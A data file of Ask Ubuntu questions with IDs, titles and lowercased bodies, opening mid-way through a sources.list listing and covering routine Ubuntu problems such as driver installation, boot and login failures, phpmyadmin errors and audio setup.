//ppa.launchpad.net/flacon/ppa/ubuntu raring main # disabled on upgrade to raring deb http : //ppa.launchpad.net/flacon/ppa/ubuntu quantal main deb-src http : //ppa.launchpad.net/flacon/ppa/ubuntu quantal main # deb http : //ppa.launchpad.net/flacon/ppa/ubuntu raring main # disabled on upgrade to raring # deb-src http : //ppa.launchpad.net/flacon/ppa/ubuntu raring main # disabled on upgrade to raring # deb http : //toolbelt.heroku.com/ubuntu ./ # disabled on upgrade to raring deb http : //toolbelt.heroku.com/ubuntu ./ # deb http : //toolbelt.heroku.com/ubuntu ./ # disabled on upgrade to raring # deb http : //ppa.launchpad.net/kilian/f.lux/ubuntu raring main # disabled on upgrade to raring # deb-src http : //ppa.launchpad.net/kilian/f.lux/ubuntu raring main # disabled on upgrade to raring deb http : //ppa.launchpad.net/kilian/f.lux/ubuntu quantal main deb-src http : //ppa.launchpad.net/kilian/f.lux/ubuntu quantal main # deb http : //ppa.launchpad.net/kilian/f.lux/ubuntu raring main # disabled on upgrade to raring # deb-src http : //ppa.launchpad.net/kilian/f.lux/ubuntu raring main # disabled on upgrade to raring # deb http : //ppa.launchpad.net/oibaf/graphics-drivers/ubuntu raring main # disabled on upgrade to raring deb http : //ppa.launchpad.net/oibaf/graphics-drivers/ubuntu quantal main deb-src http : //ppa.launchpad.net/oibaf/graphics-drivers/ubuntu quantal main # deb http : //ppa.launchpad.net/oibaf/graphics-drivers/ubuntu raring main # disabled on upgrade to raring # deb http : //ppa.launchpad.net/rye/ubuntuone-extras/ubuntu raring main # disabled on upgrade to raring # deb-src http : //ppa.launchpad.net/rye/ubuntuone-extras/ubuntu raring main # disabled on upgrade to raring deb http : //ppa.launchpad.net/rye/ubuntuone-extras/ubuntu quantal main deb-src http : //ppa.launchpad.net/rye/ubuntuone-extras/ubuntu quantal main # deb http : //ppa.launchpad.net/rye/ubuntuone-extras/ubuntu raring main # disabled on upgrade to raring # deb-src http : //ppa.launchpad.net/rye/ubuntuone-extras/ubuntu raring main # disabled on upgrade to raring deb-src http : //ppa.launchpad.net/skype-wrapper/ppa/ubuntu quantal main # deb http : //repo.steampowered.com/steam/ precise steam # disabled on upgrade to raring # deb-src http : //repo.steampowered.com/steam/ precise steam # disabled on upgrade to raring deb http : //repo.steampowered.com/steam/ precise steam deb-src http : //repo.steampowered.com/steam/ precise steam # deb http : //repo.steampowered.com/steam/ precise steam # disabled on upgrade to raring # deb-src http : //repo.steampowered.com/steam/ precise steam # disabled on upgrade to raring deb http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu raring main # deb-src http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu raring main # deb-src http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu raring main deb http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu raring main # deb-src http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu raring main # deb-src http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu raring main # deb http : //ppa.launchpad.net/tualatrix/ppa/ubuntu raring main # disabled on upgrade to raring # deb-src http : //ppa.launchpad.net/tualatrix/ppa/ubuntu raring main # disabled on upgrade to raring deb http : //ppa.launchpad.net/tualatrix/ppa/ubuntu quantal main deb-src http : //ppa.launchpad.net/tualatrix/ppa/ubuntu quantal main # deb http : //ppa.launchpad.net/tualatrix/ppa/ubuntu raring main # disabled on upgrade to raring # deb-src http : //ppa.launchpad.net/tualatrix/ppa/ubuntu raring main # disabled on upgrade to raring # deb http : //ppa.launchpad.net/webupd8team/puddletag/ubuntu raring main # disabled on upgrade to raring # deb-src http : //ppa.launchpad.net/webupd8team/puddletag/ubuntu raring main # disabled on upgrade to raring deb http : //ppa.launchpad.net/webupd8team/puddletag/ubuntu quantal main deb-src http : //ppa.launchpad.net/webupd8team/puddletag/ubuntu quantal main # deb http : //ppa.launchpad.net/webupd8team/puddletag/ubuntu raring main # disabled on upgrade to raring # deb-src http : //ppa.launchpad.net/webupd8team/puddletag/ubuntu raring main # disabled on upgrade to raring deb http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu raring main # deb-src http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu raring main thank you .
305990	boot from usb . how can i do	how can i boot ubuntu installer from usb stick ? i did it last year i do n't remember how . i used a software from windows . in bios setup menu there is not 'usb ' in the options
305992	disk usage analyzer and other programs reporting incorrect partition capacities	i recently resized/moved my home partition and then expanded my root partition into the free space remaining . i did this all off a bootable usb with gparted . when i started ubuntu back up and ran osm2pgsql ( it converts map files into databse form ) it complained about not having enough space in the root directory . running all the usual df -h , gparted , gnome-disk , gnome-system-monitor and checking properties of my root directory showed that it has a capacity of 66.2gb , of which 6.0gb is used . when i use disk usage analyzer though , it reports a size of ~6gb ( which i guess is what osm2pgsql detects too ) . the strange thing is that i did n't even start with 6gb before i resized/moved . i started with about 12gb if my memory serves correctly . also , my home partition is reported to have shrunk to 64.1gb from about 1.4tb before when using disk usage analyzer . as a final clue , disk usage analyzer reports the correct size of root before it scans the folders - not sure if that helps .
305997	display brightness setting not working in sony vaio sve151117f	i have sony vaio sve151117f , ubuntu 12.10.i used to see brightness animation upon pressing fn+f6 , f5 but not actual brightness of screen . i have tried to implement as said in http : //ubuntuforums.org/showthread.php ? t=2086359 but now i cant even see the brightness level animation.there is no change in brightness level of screen as usual . i tried below links too , but still problem persists . unable to change brightness settings in sony vaio e series laptop http : //vaioubuntu.wordpress.com/2008/12/04/finally-a-brightness-how-to-for-vaio-fw-series/
306002	root password needed	when i first installed ubuntu 13.04 from a usb stick i was asked to fill in for user username and password so i set one on my own . when i run ubuntu i click log in but it automatically logs me in as user so i ca n't type my username . as a result , in order to run certain apps or set up my network i 'm asked to type the root password for authentication . i do n't wan na log in as a superuser . please note that i 'm a newbie to ubuntu . thank you in advance .
306007	how to create a dialog and set title and text dynamically	looking at the dialog component example in the ubuntu sdk documentation , it looks as if dialogs are intended to be defined as static components with fixed title and text . or at least i can not figure out how to change it before showing the dialog . i 've also been hinted at the show ( ) method of the popupbase class on which dialog is based , but i 've not worked out how to use them for my purposes . i 've got a signal handler in my code where i 'd like to open a dialog and dynamically set the title and text . onsomethinghappened : { /* open a dialog and set the title and text properties */ } how can i do that ?
306014	login problem - enter password and it just asks fo rthe password again	i am running ubuntu 12.04 on an ibm t43 laptop . i had n't used the laptop for a few weeks and forgot the password so reset it using the info found on here but now after entering the password the screen just keeps asking for the password again ? ? ? did ls -l /home command and it displays dr-x -- -- -- i think there should be a w in there ? drwx ? ? ? any idea what is wrong and how to fix it ? i can login ok as 'guest ' and use internet but can not use my own personal login ? i 'm pretty new to unix btw - trying to learn a bit more about it .
306015	unable to log in	although i 've set up a username and password when i was installing ubuntu 13.04 , when i type inmy password it says it 's incorrect although language is checked and my password 's correct . what 's wrong ?
306017	how to install .run files ?	how can i install .run files ? when i open them with the software center , i always get the message that the file could n't be opened .
306026	replacing ubuntu 10.04 with lubuntu 13.04	i 'm having some issues with upgrading 10.04 with lubuntu 13.04 . after having supposedly replaced 10.04 , i find on startup that 10.04 opens up instead of lubuntu . i have to restart a few times until lubuntu opens . i need help in making lubuntu permanent . thanks
306029	intention for new group - but how solve data-floods ?	we are a group of deaf ( in germany and worldwide ) people , who want to join together to one group , and they are interested in ubuntu . now point is : script-language , no deaf person is very fond of script-language and not every deaf person knows the oral script-language of international deaf people . so , it would be easier to communicate via video web-cam in sign-language . the thing is then to store all questions in video-format because of sign-language comprehensible for every deaf . but then there is increasing data-flood for questions and answers . how do i solve this with such a web-video-forum at ubuntu ? i found now http : //loco.ubuntu.com/ we would like to start there .
306033	i want to remove windows 8 and windows 7 from my triple boot with ubuntu 12.04	right now in my bootloader i have 3 os namely ubuntu 12.04 , windows 7 and windows 8 . i have a virus in my pc and so windows 7 and 8 dont work . i want only ubuntu 12.04 on my pc right now and then after cleaning my pc free from viruses i may dual boot it with windows for gaming purposes . so how do i remove windows 7 and windows 8 and just keep ubuntu as my operating system ? please help .
306043	ati radeon hd 3600 driver for ubuntu	does anyone know how to install `` ati radeon hd 3600 '' driver on ubuntu 12.10 , 32bit version ? where should i download it and how should i install ? thanks ;
306047	what does the script /dev/null do ?	i was sued into another user to run screen , but i got the error can not open your terminal '/dev/pts/4 ' - please check . i found a solution : script /dev/null and after that i can use screen . why does this work ? it creates a new pseudo terminal ?
306050	ubuntu one : can you shutdown your computer when syncing is in process ?	i just installed ubuntu 12.04 on my other laptop . i logged into my ubuntu one account and it starts syncing files that i stored from my other laptop . however the files are too big and the syncing process takes too long . if i shut my laptop down , will the syncing process aborts completely or will it resume the next time i log in ?
306051	sound problem after updating ubuntu 13.04 from 12.10	after going through various forums and applying those methods , my problem still persists . i had completely removed pulseaudio as well as alsameter and then re-installed them followed by a force reload and a restart . sound is still not coming . please suggest what to do ?
306054	jackd server will not start exit code 225	could anybody explain the errors i am receiving using jackd with qjackctl 13:25:50.333 alsa connection graph change . 13:26:11.822 jack is starting ... 13:26:11.822 /usr/bin/jackd -r -dalsa -dhw:2 -r44100 -p1024 -n3 -d -phw:2 can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started 13:26:11.833 could not start jack . sorry . 13:26:13.100 jack was stopped with exit status=255 . i have used this before without issue but on 13.04 i cant get it to start at all using any of my audio devices , here is my current set up nothing is different from my 12.10 set up , i am a member of the audio group and hw:2 is the correct device , am i missing something ? as a side note are there any alternatives to jack i could try ?
306055	electrical sounds in earphones when laptop is plugged in	i hear annoying electrical static noises in my earphones when my laptop is plugged in . they disappear upon my unplugging the power supply . however there is still a buzz when i move the cursor . can this problem be fixed ? my ubuntu version is 12.04 . the laptop is a dell latitude d630 . thanks in advance .
306056	how to detect whether an app is running on a mobile device or on the desktop	i 'm using the ubuntu sdk to develop a qml app that runs both on the desktop and on mobile devices . depending on where it 's running on the desktop or on a device , certain behaviours should be different . what 's the recommended way of programmatically detecting whether an app is running on the desktop or on a mobile device ?
306057	skype count and progress indicators are not working	in 12.10 the count and progress indicators on the skype launcher icon were working just fine ( skype 4.1 and 4.2 ) . but in 13.04 they are not working . is there a fix for this ?
306058	why do i have no adress bar and why is netflix slow	on my computer i downloaded ubuntu and it worked great , but then one day my address bar did n't show up on my name . i share the computer with my brothers , so i went on their name to see if they had the address bar . they did , and i was stuck without it . please tell me what happened , and how to get it back . also i downloaded netflix and it is really slow and does n't work well at at all .
306062	how can i tell if windows 7 update is deleting my kernel ?	i have a dual install going with windows 7 and ubuntu 12.04 . my window updates have been set to manual however i just find it really strange that every time i do a windows update my linux kernel goes missing and my grub loader fails at stage 2 and presents me with the grub console . i have hunted around in my boot folder looking for my kernel ( hd0 , msdos2 ) using the grub cli and it appears not to be there . i have also setup a usb drive with ubuntu so i can try and recover my installation using boot-repair but this does not work . i am really annoyed with this because i have to re-run the wubi installer and i keep losing my information . is there a way to safe-guard my ubuntu against the malevolent updates from microsoft so i do n't have to keep going through this process ? my version of ubuntu is 12.04 lts .
306064	unable to access other volume in vaio e series	error mounting /dev/sda6 at /media/ravi/new volume : mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda6 '' `` /media/ravi/new volume '' exited with : non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda6 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
306065	opening external links in google+	why ca n't i open external links from within google+ ? tried with firefox and chrome ( even without addons and with new clean profiles ) when i click a link , it opens in a new tab and tries to load , but eventually stops with a ( translated from norwegian ) : connection aborted if i paste the url in adress-field the page loads fine . running ubuntu 13.04 . tried booting from a live 13.04 and used google apps-account and even a private account . the result was the same..
306070	how to recompile vim ?	i want to recompile vim the exact same way ubuntu has compiled it , but with one difference ( ruby support ) . i have already compiled with ruby support , but by using my own configure options , vim -- version is different in several ways from the ubuntu version and is causing problems . if i knew how ubuntu used ./configure i could do this . is there a place where i can find out how ubuntu used ./configure for vim while making the ubuntu binary ? i 'm guessing somewhere like http : //bazaar.launchpad.net/~ubuntu-branches/ubuntu/raring/vim/raring/files/head : /debian/ might have the answer ? edit : this http : //bazaar.launchpad.net/~ubuntu-branches/ubuntu/raring/vim/raring/view/head : /debian/rules looks like it . now how to use ? edit : currently trying http : //www.moosechips.com/2008/09/ubuntu-rebuild-a-source-package/ edit : yes , doing that worked , i 'm a new `` ask ubuntu '' user so i ca n't answer my own question for 6 hours or something , otherwise i would now .
306072	ubuntu touch availability on windows tablet	can i install ubuntu touch on an acer w510 tablet ? i could n't find any instructions at ubuntu.com .
306078	import python bindings for meta tracker introspection	when i try to run the metatracker introspection examples or import the tracker module in ipython console i get an import error . googling for this particular error message does n't turn up anything except the patch that created these supposedly working examples for meta tracker in 2012 . python 2.7.4 ( default , apr 19 2013 , 18:28:01 ) ipython 0.13 -- an enhanced interactive python . in [ 1 ] : import gi in [ 2 ] : from gi.repository import tracker , gobject error : root : could not find any typelib for tracker -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - importerror traceback ( most recent call last ) < ipython-input-2-0b29c3277539 > in < module > ( ) -- -- > 1 from gi.repository import tracker , gobject importerror : can not import name tracker and what is a typelib and how do i install or import one for tracker ?
306080	what drivers do i need ? how do i install them ?	i have been trying for quite some time to install amd-drivers to my ubuntu 13.04 computer . a lot of try-and-fail have been done and a lot of tutorials have been read , and a lot of questions have been asked , but alas , i am still stuck on the same spot . i dont know if it might be that my machine simply is too old to make use of the drivers available or if it is me that has been downloading the wrong drivers , i never had the same problem on windows thou , but i guess itĺ not the same . anyway , under here i will place my hardware-information : 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs880m [ mobility radeon hd 4225/4250 ] not to long ago i made use of nooblabs tutorial that searches my hardware to see what amd-drivers i use. `` http : //www.noobslab.com/search ? q=amd & x=0 & y=0 `` but they did not even find any amd-hardware at all , could this be a sign that my computer might be to old ? previous experience : i have been downloading the drivers i thought would be the corrent ones , however , every time i install `` fglrx '' unity stops working and all . dash also stops working and i have to navigate by using my keyboard . so if anyone knows how i am to fix this , please help me . i am a gamer and is in dire need to get my graphics working .
306084	desktop does n't load after installing ati driver	i installed ati radeon hd 3650 on ubuntu 12.10 32-bit using following commands : cd lib/3.5.0-17-generic/kernel/drivers unzip *.zip chmod +x *.run sudo ./*.run but after restarting the system , i saw a change in resolution in the login page , and also the desktop did n't load the icons and menu bar after logging in . actually after logging in , i just have a desktop with nothing but the background wallpaper . how can i fix this ?
306087	can pxe be used to logon to vm	can i use pxe to boot a thin/fat client directly into a running vm . my plan is to have my server running the vms ( windows and ubuntu machines ) in xen or kvm i need for the family to use and have some thin/fat clients to log on from . is it possible/doable to chose what machine to boot into from pxe or ltsp . how do i set it up . my searches until now have not reveiled how to do it .
306090	12.04 failed to load module `` nvidia '' ( module does not exist , 0 )	i have asus ul50vt with nvidia optimus hybrid graphics ( geforce 210m ) . i recently installed ubuntu 12.04 , and in details app it was showing me , that i am on intel video driver . so , i installed bumblebee and after reboot , details showed `` vesa : gt218 board - 0698a740 '' as vesa differs from nvidia , i uninstalled bumblebee , but bug has n't gone : ( now my xorg.0.log contains : cat /var/log/xorg.0.log | grep nvidia [ 12.616 ] ( ii ) loadmodule : `` nvidia '' [ 12.634 ] ( ww ) warning , could n't open module nvidia [ 12.634 ] ( ii ) unloadmodule : `` nvidia '' [ 12.634 ] ( ii ) unloading nvidia [ 12.634 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) [ 12.634 ] ( == ) matched nvidia as autoconfigured driver 0 [ 12.634 ] ( ii ) loadmodule : `` nvidia '' [ 12.634 ] ( ww ) warning , could n't open module nvidia [ 12.634 ] ( ii ) unloadmodule : `` nvidia '' [ 12.634 ] ( ii ) unloading nvidia [ 12.634 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) additional drivers says , that nvidia is activated but not currently in use : jockey-text -- list | grep nvidia kmod : nvidia_current - nvidia_current ( proprietary , disabled , not in use ) kmod : nvidia_current_updates - nvidia_current_updates ( proprietary , enabled , not in use ) kmod : nvidia_experimental_304 - experimental nvidia binary xorg driver , kernel module and vdpau library ( proprietary , disabled , not in use ) kmod : nvidia_experimental_310 - experimental nvidia binary xorg driver , kernel module and vdpau library ( proprietary , disabled , not in use ) nvidia x server settings writes on start : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . suggested by http : //askubuntu.com/a/121612/165811 sudo apt-get install linux-headers-`uname -r` sudo dpkg-reconfigure nvidia-current sudo nvidia-xconfig sudo reboot does not change anything . i 'm still on fallback vesa driver . resolution is 1280x768 instead of 1366x768 . how can i find out why nvidia-current fails to load nvidia module , which , i believe exists : modprobe -l | grep nvidia kernel/drivers/video/nvidia/nvidiafb.ko kernel/drivers/net/ethernet/nvidia/forcedeth.ko updates/dkms/nvidia_current.ko updates/dkms/nvidia_current_updates.ko updates/dkms/nvidia.ko if it can help , here is my xorg.conf : cat /etc/x11/xorg.conf # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 304.88 ( buildmeister @ swio-display-x86-rhel47-06 ) wed mar 27 15:32:58 pdt 2013 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection also , how can switch to my on-board intel graphics , that served me well earlier ? update lshw shows me , that my display is unclaimed : *-display unclaimed description : vga compatible controller product : gt218 [ geforce g210m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list configuration : latency=0 resources : memory : fd000000-fdffffff memory : e0000000-efffffff memory : fa000000-fbffffff ioport : dc00 ( size=128 ) memory : f0000000-f007ffff it looks like linux does not know about my integrated graphics at all : lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation gt218 [ geforce g210m ] ( rev a2 )
306093	is it safe to use 3.9 kernel from ppa because 3.8 is broken in 13.04 on my hardware	i have a acer 1810tz with ssd on which ubuntu runs really fast , except that 13.04 introduced a bug that made my laptop freeze after every suspend and nearly every boot . had to force a restart every time . no use . i finally tracked it down to a 3.8 kernel bug with certain intel graphic chips , causes an irq storm from the i915 , described here i updated the kernel to 3.9 following the instructions on ubuntu kernel/mainlinebuilds wiki . ( download 3.9 images and dpkg -i , restart ) problem gone , laptop is running fine and is usable again . no more freezes . running 3.8 kernel is no option on my hardware , downgrading to 12.04 lts is not attractive either ( it had it 's problems ) . is it safe to keep using this 3.9 kernel on 13.04 ? what 's best advice here ?
306094	phpmyadmin throws a 404 on opening	i have installed php5 and phpmyadmin from the ubuntu software centre on a fresh install of ubuntu 13.04. when i enter localhost in my browser the following is displayed : it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . so something is working . if i then type in localhost/phpmyadmin or localhost/phpmyadmin/index.php the page returns a 404 error page , file not found . i created a file in /var/www called test.php with one line in it < ? php phpinfo ( ) ; ? > when i try to access it through my browser , i get 403 forbidden this points to a permissions problem with phpmyadmin i also installed : apache http server metapackage ( apache2 ) base support for javascript library packages ( javascript-common ) fast webserver with minimal memory footprint ( lighttpd ) mysql client ( mysql-client ) gd module for php5 ( php5-gd ) mysql server ( mysql-server ) when installing phpmyadmin , i was not asked any questions , which i found interesting as on previous installs , i have been asked to choose a server . the folder /etc/phpmyadmin has the following content : conf.d/ config-db.php.ucf-dist the folder conf.d has no content is there something i need to install which i have n't or is there something i can do to fix the 404 & 403 errors ? edit owners in /var : /var $ ls -lh total 48k drwxr-xr-x 2 root root 4.0k jun 9 12:16 backups drwxr-xr-x 21 root root 4.0k jun 9 13:28 cache drwxrwsrwt 2 root whoopsie 4.0k jun 9 16:01 crash drwxr-xr-x 73 root root 4.0k jun 8 19:24 lib drwxrwsr-x 2 root staff 4.0k apr 19 10:03 local lrwxrwxrwx 1 root root 9 jun 9 16:00 lock - > /run/lock drwxr-xr-x 20 root root 4.0k jun 9 16:01 log drwxrwsr-x 2 root mail 4.0k apr 24 18:01 mail drwxrwsrwt 2 root whoopsie 4.0k apr 24 18:05 metrics drwxr-xr-x 2 root root 4.0k apr 24 18:01 opt lrwxrwxrwx 1 root root 4 jun 9 16:00 run - > /run drwxr-xr-x 10 root root 4.0k jun 8 19:41 spool drwxrwxrwt 4 root root 4.0k jun 9 16:25 tmp drwxr-xr-x 2 www-data www-data 4.0k jun 7 21:04 www and : ... : /var $ ls -lh /var/www total 12k -rw-r -- r -- 1 www-data www-data 177 jun 7 20:30 index.html -rw-r -- r -- 1 www-data www-data 3.5k jun 7 20:30 index.lighttpd.html -rw-r -- r -- 1 www-data www-data 20 jun 7 21:04 test.php -rw-r -- r -- 1 www-data www-data 0 jun 7 21:04 test.php~ on restarting the apache2 service i get the following in terminal simon @ simon-vgn-ar71e : ~ $ sudo service apache2 restart apache2 : syntax error on line 260 of /etc/apache2/apache2.conf : could not open configuration file /etc/apache2/conf.d/phpmyadmin.conf : no such file or directory action 'configtest ' failed . the apache error log may have more information . ... fail ! i renamed phpmyadmin.conf link and ran sudo ln -s /etc/phpmyadmin/apache.conf /etc/apache2/conf.d/phpmyadmin.conf see the broken link symbol in nautilus : simon @ simon-vgn-ar71e : ~ $ ls -lh /etc/apache2/conf.d total 16k -rw-r -- r -- 1 root root 269 jul 16 2012 charset lrwxrwxrwx 1 root root 45 jun 7 21:14 javascript-common.conf - > /etc/javascript-common/javascript-common.conf -rw-r -- r -- 1 root root 3.3k jul 16 2012 localized-error-pages -rw-r -- r -- 1 root root 143 jul 16 2012 other-vhosts-access-log lrwxrwxrwx 1 root root 28 jun 9 17:28 phpmyadmin.conf - > ../../phpmyadmin/apache.conf -rw-r -- r -- 1 root root 1.7k jul 16 2012 security end===================================
306107	importing .doc and .jpg files to 13.04	i 'm a new user - not familiar with the limitations or options available with partitioned hard drives . i just installed 13.04 on a partitioned hard drive to dual boot with windows 7 . now i want to import .doc and .jpg files from an external drive into ubuntu . will i be able to access these files on the windows side of the partition and vice versa ? if i create something using ms office , or other windows software , will i be able to access the file in ubuntu ? thanks !
306109	how can i make my ubuntu bootable usb key bootable on a mac ?	so i downloaded ubuntu 12.04 lts into my 16 gig usb key and i downloaded refind , but i ca n't find a way to make it my default boot manager.can someone tell what to do ?
306111	why do games lag in wine for me but everyone else seems to not experience this ?	everyone else in the world seems to be able to play steam games in wine just fine , except for me . i am running a brand new nvidia geforce 670 , i have a quad core i7 920 2.67ghz , and 11gb ddr3 ram . counter-strike : global offensive , runs choppy in wine left 4 dead 2 , runs choppy in wine counter-strike : source , runs choppy in wine even the native games such as left 4 dead 2 beta and team fortress 2 run choppy in wine . counter-strike : source natively runs good . for the record , all of these games run 100 % with excellent frames in windows 7 on this same computer . i have tried all of the proprietary drivers , and i am currently set to 313 . am i doing something wrong ? a bad wine setting ? keep in mind my wine drives are being set up by playonlinux . if anyone can help , thanks ! i do not want to go back to windows , but it 's looking like this linux thing is just an uphill battle that still ends up with poor performance . i 've been using linux for almost 3 months now , it 's like everything is a battle to get a task done .
306113	alacarte creating entries shown in menu but not in editor	i created a `` calculator '' entry in main applications menu of xubuntu , using alacarte ( gcalctool command - it seems to be a wrong one , as it ca n't find it ) . but : it is not shown in the list of alacarte , so i can not delete or hide it . i suppose i have to edit a .desktop file . i found two of them and i tried `` hide only root entries '' from here but none of them has `` x-xfce-toplevel ; '' in it 's categories . why does not alacarte `` control '' some entries ? how can i repair or delete these entries ? edit : i have found that there are also some entries of this type by default , not only in the root menu , but also in the submenus . even after restoring the `` system default '' menu .
306115	how do i install firebird 2.1 on ubuntu 13.04	when updating form ubuntu 12 to 13 my firebird 2.1 was uninstalled . now , when i try to install it , it seems that the package is obsolete . root @ ricardo-pc : / # apt-get install firebird2.1-classic reading package lists ... done building dependency tree reading state information ... done package firebird2.1-classic is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'firebird2.1-classic ' has no installation candidate how can i install it ?
306117	how do i turn on my wireless ?	i am brand new to linux systems ( day 2 ) with no prior knowledge ( phd in physics , not linux ) i had my wireless up and running via ndiswrapper , but when ubuntu updated , and i restarted my computer ( as prompt ) i was left without my wireless connection . my network is run by a atheros ar5b93 wireless network adapter with a atheros ar8151 pci-e gigabit ethernet controller ndiswrapper is saying the driver is installed , and hardware found . command modprobe ndiswrapper leaves me with fatal : module not found i 've tried reinstalling ndiswrapper and the drivers with no avail . help would be appreciated .
306119	installing cuda 5.0	i want to install the cuda 5.0 toolkit package from the ubuntu public repository but it needs to remove my nvidia 319.27 driver which i do not want to be removed- it needs to remove it as it has been packaged with the older 304 driver . how can i install the cuda 5.0 toolkit without having to remove my nvidia 319.27 driver ?
306122	java.net.connectexception : connection refused	i am doing my final year project on java platform under ubuntu and at first i was getting a permission denied error i.e , java.net.bindexception : permission denied but after increasing the port number i 've resolved that . now on the client side i am getting a connection refused error . i have pinged both server and client and both are working fine ; i am using java sdk 7 for this project . i cant resolve this connection refused error but the same code is working fine under windows , any suggestions ?
306124	blank screen after resume from suspend with ati	i 've recently installed lubuntu 12.04 lts on an old machine : dell latitude d600 processor : intel centrino ram : 2gb video card : ati i put the laptop in suspend mode by : $ sudo s2ram -f and it works fine , but on resuming it remains blank and nothing happens . the laptop is on but the screen is off . i googled a lot but nothing does the job . any suggestions ?
306125	input.outpur error during installation	when start installation ubuntu 12.04 lts 386 along with windows xp , i get the message { errno 5 : input/output error } . i though it was dvd drive failure and i installed a new drive but i still have the same problem , any suggestion ?
306128	hp color laserjet cp1515n is not recognized ( networkprinter )	i have a notebook with ubuntu 12.04 and everything is working even the printer mentioned above . i got a new pc-system and also installed ubuntu 12.04 . i thought setting up the printer will be a piece of cake since it already works on my notbook . i ca n't get ubuntu 12.04 to recognize my printer on my pc . i searched the net and found this : hp laserjet printer not recognized in 12.04 with hplip installed i tried it but no printer is found . i really do n't know what to do anymore and i just do n't get it . why is the printer recognized and working on a notebook with ubuntu 12.04 but not on my new pc ? the printer also works with the macbook i also own . any suggetions ? mark
306133	display errors after upgrade from kubuntu 12.10 to 13.04	i recently upgraded from kubuntu version 12.10 to 13.04 using the automated tool , only to find several display related problems . the system had not been upgraded from an earlier version before . first of all , most semi-transparent dialogs such as the battery dialog displays in a flawed and often unreadable way . this includes the login dialog and the volume level bar that is shown when the volume level is changed . some ( such as the run dialog ( alt+f2 ) and the thumbnails shown when hovering over windows in the taskbar ) do show correctly , however . secondly , i have noticed that the present windows effect will lead to windows flickering while the effect is visible . i run an integrated intel graphics card on a laptop ( thinkpad e320 ) with stock graphics drivers . i ca n't think of any system modifications that could have caused this. , as the installation i have is mostly standard . none of these problems existed before the upgrade .
306136	can not boot in ubuntu 13.04 on windows 8	i am running windows 8 , and when i try to select ubuntu in the boot menu , i get a screen telling me that it can not load . there is some sort of error that is as follows : file : \ubuntu\winboot\wubildr.mbr status : 0xc000007b is anyone familiar with this error . by the way , i am sorry if this question is a repeat of another one .
306137	ssh shell prompt does not show user @ host for one user	i have ubuntu 12.04 server running . i created user1 when i installed , and created user2 today with '1useradd ' and i added it to all the same groups as user1 . but when i log in remotely using ssh , the prompt for user1 looks like this : user1 @ host : ~ $ and the prompt for user2 looks like this : $ most importantly , the shell does n't behave as nicely as i 'm used to when i 'm logged in as user2 . there is no autocomplete of commands or files with tab , and i ca n't access the mru with up .
306140	installing vim text editor on ubuntu	just installed lamp server and need to use vim editor to edit php.ini the cli command 'sudo apt-get install vim ' gives me the following error : < package 'vim ' is not available but is refered to by another package . this means the package is missing or is obsolete , or is only avaiable from another source . e : package 'vim ' has no installation candidate > please advise
306144	problem on running shell script ( how to not make it run from gedit ) - ubuntu 12.04	i want to run shell script or at least run it from terminal . i tried going to home folder/edit/preferences/behaviour and set executable text files to 'ask each time ' but it does n't even give the option to run from terminal , etc ( even after restart ) . i also tried choosing 'run executable text files when they are opened ' but both keep opening via gedit .
306151	memory does n't make sense	i just checked how much free space i have left on my hard disk using : ~ $ free -t total used free shared buffers cached mem : 4063056 1075744 2987312 0 65064 551704 -/+ buffers/cache : 458976 3604080 swap : 4124668 0 4124668 total : 8187724 1075744 7111980 but how is it possible that i have only 7 gb left while my hard disk is 320gb ? also , how can i make space easily and safe ?
306153	how to find the window of a specific file in the multiple windows of okular with multiple files open	i use okular to open , say 5 , pdf files . now i need to find one pdf file , say `` helloworld.pdf '' however , when i click the okular icon , 5 small windows show up on the desktop . the windows are so small that i can not tell which one is `` helloworld.pdf '' i hope okular has a `` window '' button , so that when i click it , it will show 5 pdf file names , and i can easily choose one . or maybe i miss how to do it , since i think okular should have a similar function as it is a famous pdf browser for ubuntu .
